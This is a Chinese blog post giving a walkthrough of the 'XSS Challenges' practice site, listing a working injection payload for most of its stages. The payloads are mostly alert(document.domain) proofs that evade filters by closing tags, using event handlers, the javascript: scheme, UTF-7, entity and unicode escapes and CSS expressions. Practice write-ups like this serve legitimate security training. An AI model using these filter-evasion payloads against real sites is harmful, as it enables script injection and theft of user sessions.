XSS Challenges

最新推荐文章于 2024-02-28 19:07:06 发布
最新推荐文章于 2024-02-28 19:07:06 发布
阅读量5.2k 收藏 1
点赞数
分类专栏: Vulnerability Analysis Pentesting Xss Web Applications
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/28038509
版权

http://xss-quiz.int21h.jp/
Notes (for all stages):
* NEVER DO ANY ATTACKS EXCEPT XSS.
* DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...)
* Some stages may fit only IE.

Stage #1:
地址: http://xss-quiz.int21h.jp/?sid=7b2ec32a44f5676dbc2ad38d82708b4e48d596df
提示: very simple...
方案: Xssss"</b><script>alert(document.domain);</script><b>"Xssss

Stage #2:
地址: http://xss-quiz.int21h.jp/stage2.php?sid=4998593ac8245a1e877a2c16905603858fa94e8f
提示: close the current tag and add SCRIPT tag...
方案: Xssss"><script>alert(document.domain);</script><br id="x

Stage #3: 其他可用提交项
地址: http://xss-quiz.int21h.jp/stage-3.php?sid=02f61eab83fab43d957ebf83139f53584a5f65b8
提示: The input in text box is properly escaped.
方案: p2=Japan<script>alert(document.domain);</script>

Stage #4: 隐藏的表单项
地址: http://xss-quiz.int21h.jp/stage_4.php?sid=e6cc736448dbe244a28fb221afde842150c404f4
提示: invisible input field
方案: p3=hackme"><script>alert(document.domain);</script><br id="x

Stage #5: 输入框长度被限制
地址: http://xss-quiz.int21h.jp/stage--5.php?sid=25dff63827e73b082b8d196a13a0ed3a6d7fb7dc
提示: length limited text box
方案: p1=Xssss%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2fscript%3E%3Cb%20id%3D%22x

Stage #6: <,> 被转换为&lt; &gt;
地址: http://xss-quiz.int21h.jp/stage-no6.php?sid=d37bbdc69d77bd8b10ec200e24dd6f0450b4cc53
提示: event handler attributes
方案: Xssss" οnfοcus=javascript:alert(document.domain);  id="x

Stage #7: 添加元素属性
地址: http://xss-quiz.int21h.jp/stage07.php?sid=7abf224a51a26fd9b765e5f5a4f625636f978ef1
提示: nearly the same... but a bit more tricky.
方案: Xssss οnfοcus=javascript:alert(document.domain)

Stage #8: 利用href
地址: http://xss-quiz.int21h.jp/stage008.php?sid=3d0bb2a2691110ff2fb7d43162d99e9d0e8b6c45
提示: the 'javascript' scheme.
方案: javascript:alert(document.domain);

Stage #9: UTF-7 -- IE7测试成功(php -- mb_convert_encoding($string, 'UTF-7'))
地址: http://xss-quiz.int21h.jp/stage_09.php?sid=902024280ebc04bfbeca57f2e54e75a482c14e12
提示:
方案: p1=Xssss%2BACI++onmouseover%2BAD0AIg-javascript%3Aalert%28document.domain%29%2BACI++id%2BAD0AIg-x&charset=UTF-7

Stage #10: 字符串domain被过滤
地址: http://xss-quiz.int21h.jp/stage00010.php?sid=1d55eee5a44ab3d875549671b0d7fdd53d8c05e1
提示: UTF-7 XSS
方案: p1=Xssss%22%3E%3Cscript%3Ealert%28document.ddomainomain%29%3B%3C%2Fscript%3E%3Cbr+%2F

Stage #11: 过滤-标签/方法
地址: http://xss-quiz.int21h.jp/stage11th.php?sid=af010211680adb334c35671f3d146723df66e8ec
提示: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"
方案: p1=Xssss"><a href="javascr&#105;pt:alert(document.domain);">Xssss</a><br id="x

Stage #12: ie
地址: http://xss-quiz.int21h.jp/stage_no012.php?sid=5e25fb0f407625837c9810f58c66673c52df60e0
提示: "s/[\x00-\x20\<\>\"\']//g;"
方案: ``οnfοcus=alert(document.domain)

Stage #13: STYLE
地址: http://xss-quiz.int21h.jp/stage13_0.php?sid=9b00913b1a60ca6344c1f26a6d352af3d7ee4c72
提示: style attribute
方案: background-color:salmon;input:expression(javascript:alert(document.domain)) IE循环弹框
方案: background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))

Stage #14: STYLE 注释符
地址: http://xss-quiz.int21h.jp/stage-_-14.php?sid=a629a8aaa2a217f28046edb7722a9083f4612419
提示: s/(url|script|eval|expression)/xxx/ig;
方案: background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))

Stage #15: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage__15.php?sid=0480521f1f39f182becacfbedf36210ca0140fe5
提示: document.write();
方案: hogehoge\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

Stage #16: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage00000016.php?sid=9c7972a074c9caf57100746acaab2864cd2dff2e
提示: "document.write();" and "s/\\x/\\\\x/ig;"
方案: hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Stage #17:
地址: http://xss-quiz.int21h.jp/stage-No17.php?sid=53f40e41f2c7a0eef557e1f469e312e02aa0ddba
提示: multi-byte character
方案: p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

Stage #18:
地址: http://xss-quiz.int21h.jp/stage__No18.php?sid=66431e719a0b192f11d5c86252382c114ad7dda3
提示: us-ascii high bit issue

Stage #19:
地址: http://xss-quiz.int21h.jp/stage_--19.php?sid=e32c8f9cd60f79786b67defb896fad8a7c7f461a
提示: Twitter DomXss at Sep 24, 2010
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
其他过关方案:
http://blogs.tunelko.com/2013/12/02/xss-challenges/
http://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt

推荐:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Nixawk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
springboot整合XSS
03-20
springboot 整合预防xss攻击
常用ASCII URL编码对照表,JavaScript中如何把url的%20、%22、%28、%29、%7B、%7D解析还原成真实的字符
热门推荐
青颜的天空的博客
07-28 22万+
由于url支持26个英文字母、数字和少数几个特殊字符,因此,对于url中包含非标准url的字符时,就需要对其进行编码。
web安全之 xss漏洞 xss challenges
m0_46377671的博客
10-20 306
http://xss-quiz.int21h.jp/可用于联系xss漏洞 第一题 直接注入 第二题 查看代码: 制造闭合语句 第三题 直接输入时无变化 使用burp后查看具有两个参数的传递 通过更改两个参数参数的注入 达到目的 p2为主要的参数 试用其判断 两个参数必须有值 开始只改变p1的值没有变化。。。发现p2是主要参数 后来改变p2参数 又忘记改p1了。 第四题 与第四关相似 不过多了个参数p3 尝试使用第三关的方法 不行 看见了这个可与前面第二题相似 尝试 构造闭合 ">
XSS Challenge 通关思路(更新中)
最新发布
weixin_48803338的博客
02-28 1048
XSS(CSS):全称叫“跨站脚本(js)攻击”。指攻击者在网站页面注入恶意脚本,使其在用户浏览页面时执行。XSS危害:1.盗取cookie(用户的身份认证)2.非法转账 3.钓鱼等XSS分类:反射型:插入的恶意js代码没有放在数据库中存储型:插入的恶意js代码存放在数据库中。
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1287
xss挑战前十关
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 3779
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
xss挑战心得(简单易懂)
xtx4506的博客
03-09 1842
作为一个呢刚刚学习web渗透的小菜鸟,一开始也是在老师的带领下接触到了xss挑战,个人感觉是很经典的题目嗷,以后就会在这里进行再学习了,这两天挑战也是记录了不少,所以希望可以记录下来,菜鸟的自我记录,大神勿喷噢 ---------------------------------------------------------------------------------------------------------------------- level 1 相信不少人和我一样看到...
XSS入门 XSS Challenges靶场搭建/前五关/基础教程
ChenD的学习笔记
10-11 1055
XSSChallenges 前五关,XSS注入点判断
XSS基础——xsslabs通关挑战
weixin_53284312的博客
02-18 2781
xss基础——xsslabs 闯关
Xss Scan tool
05-25
Xss Scan,一款可以安装在burpsuite的插件,用于xss漏洞的扫描。 专业 好用
xss平台源码
09-28
xss平台,可以实现XSS盲打等,需要的朋友可以下载。
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
XSS payload大全
01-22
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
XSS Challenges 题解__进行中
流云阁
04-26 740
地址:http://xss-quiz.int21h.jp/stage 1:input: &lt;script&gt;alert(document.domain)&lt;/script&gt;stage 2:hint: close the current tag and add SCRIPT tag...------&gt; value="" 里面闭合input:   "&gt;&lt;script...
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5538
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
xsschallenge1~13通关详细教程
来日可期的博客
08-25 1637
xsschallenge通关详细教程
XSS学习笔记:XSS Challenges 1-19通关全详解
闵行小鱼塘
10-07 5742
通过 XSS Challenges 平台学习下XSS,共19关
XSS-Challenge详解(内含知识点
Samblue_M的博客
02-06 1041
XSS-Challenge笔记 1 随便输入 <> 下方回显 No result for “<>” 可以猜测输入框没有对敏感字符进行过滤‘ 题目要求:Inject the following JavaScript command: alert(document.domain); 构造shellcode <script>alert(document.domain)</script> 2 ????绕过标签 构造shellcode <script>a
[理论-学习]Web安全-XSS-基础13
3hex的博客
08-27 526
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: XSS Challenges Stage #10:http://xss-quiz.int21h.jp/, Firefox浏览器,BurpSuite 一、概述 绕过鼓励domain为空的xss。 二、XSS探测 1. 正常的数据提交 提交的123abc,出现在input的value属性中。 2. 代码审查 通过代码审计,我们这可以使用标签闭合引入script。 ...
exploit - dahua camera backdoor
Nixawk
03-17 1万+
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.Exploit CodeI’ll share it later.$ python exploit_dahua.py 192.168

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值